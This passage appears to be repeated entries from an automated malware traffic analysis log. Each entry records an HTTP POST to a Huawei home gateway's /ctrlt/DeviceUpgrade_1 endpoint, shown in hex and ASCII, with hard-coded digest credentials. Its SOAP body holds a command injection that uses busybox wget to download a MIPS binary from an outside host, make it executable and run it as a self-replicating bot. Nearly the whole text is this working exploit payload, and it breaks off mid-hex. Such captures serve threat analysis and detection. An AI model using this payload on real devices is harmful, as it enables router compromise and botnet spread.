3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 